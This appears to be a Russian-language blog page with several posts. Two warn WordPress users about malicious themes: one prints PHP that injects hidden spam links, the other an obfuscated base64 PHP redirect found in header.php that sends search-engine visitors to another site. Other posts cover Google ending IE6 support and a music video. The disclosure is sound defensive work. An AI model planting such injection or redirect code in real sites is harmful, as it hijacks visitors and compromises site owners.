Начал добавлять одну площадку в Sape.ru, все шло путем, но пока их робот сканировал страницы и добавлял их себе в базу, обнаружил, что количество внешних ссылок с моего сайта он насчитал на две больше! Внешне на сайте этих ссылок нет, но заглянув в исходники обнаружил пару левых ссылок

<a href="http://maqe.ru" class="xl">maqe.ru</a> <a href="http://slonovnik.ru" class="xl">slonovnik.ru</a>

В файле стилей я обнаружил код, который скрывает эти ссылки:

a.xl{
    display: none !important;
}

Ну а код, который как раз вставляет эти ссылки в наш блог находился в файле functions.php который лежит в теме нашего сайта и выглядит он так.

function bloqinfo($name = '') {    echo '<a href="http://kinowind.ru" class="xl">kinowind.ru</a> <a href="http://vstorone.ru" class="xl">vstorone.ru</a>'; }
function bloq($name = '') {    echo '<a href="http://maqe.ru" class="xl">maqe.ru</a> <a href="http://slonovnik.ru" class="xl">slonovnik.ru</a>'; }

Конечно весь мусор этот я удалил и теперь доволен. Но совет всем, кто качает бесплатные темы для своих сайтов, обязательно проверяйте их на тему таких вот эксплоитов.

Сегодня у Костика на сайте Steinar.ru обнаружили в файле header.php код вируса, он перенаправлял посетителей, которые пытались перейти на этот сайт из Google на на другие левые сайты типа этого “http://magik-tunes.com/?&wmid=112″. Самое интересное, что если просто в адресной строке набрать адрес его сайта, то все нормально, но если пришли с поисковика, то перекинет на один из этих сайтов.

Вот код вируса:

<? function _879214760($i){$a=Array('SFRUUF9SRUZFUkVS','aHR0cDovL3J1em9uZXh4eC5jb20vP3VpZD1jN2FjOTA0MDhmZWNlYWNkZDg5MjBkOGZlMmUzNGE0NA==','Z29vZ2xlLnJ1','eWEucnU=','eWFuZGV4LnJ1','bWFpbC5ydQ==','cmFtYmxlcg==','TG9jYXRpb246IA==');return base64_decode($a[$i]);} ?><?php __0($_SERVER[_879214760(0)],_879214760(1));function __0($_0,$_1){if($_0!=false){$_2=array(_879214760(2),_879214760(3),_879214760(4),_879214760(5),_879214760(6));foreach($_2 as $_3){if(strstr($_0,$_3)){header(_879214760(7) .$_1);die();}}}} ?>

Так что рекомендую всем кто держит сайты проверить файлик header.php на наличие в самом начале подобного текста и если он там, то удалить его. Главный вопрос, который меня мучает – это как им падлам удалось его туда запихнуть? Я понимаю, если бы он не обновлял движок и сидел бы на доисторической версии, но у него установлена самая на сегодня последняя версия WordPress 2.9.1.

Сегодня узнал отличную новость. Оказывается Google решил прекратить поддержку IE6 в своих продуктах, в частности таких как Google Docs, а в последствии и везде где только можно. Связано это с последними критическими уязвимостями в этом браузере, при помощи которых у куче пользователей угнали их аккаунты. А еще до этого правительство Германии и Франции призывало всех отказаться от этого старого браузера, которому уже 9 лет, но на котором сидит еще очень много народу.

Я уже так долго жду, когда этот недобраузер канет в лету. Сил нет уже под него верстать. Будем надеяться, что такая крупная корпорация, сможет повлиять на его полную гибель.

Как обычно, пока искал инфу для своего сайта, наткнулся на один необычный, как мне показалось клип THE KNIFE – Pass this on. Хрен его знает кто это и вообще о чем, но почему то зацепила меня музыка в сочетании с визуальным рядом. Певица какая-то совершенно невозмутимая, странная и перекаченная. Такое ощущение, что это трансвестит. Люди все в клипе с непонятными выражениями лиц и обстановка годов так 90-х. Странноватый клип, но почему-то цепляет. Видимо у меня настроение сейчас подобающее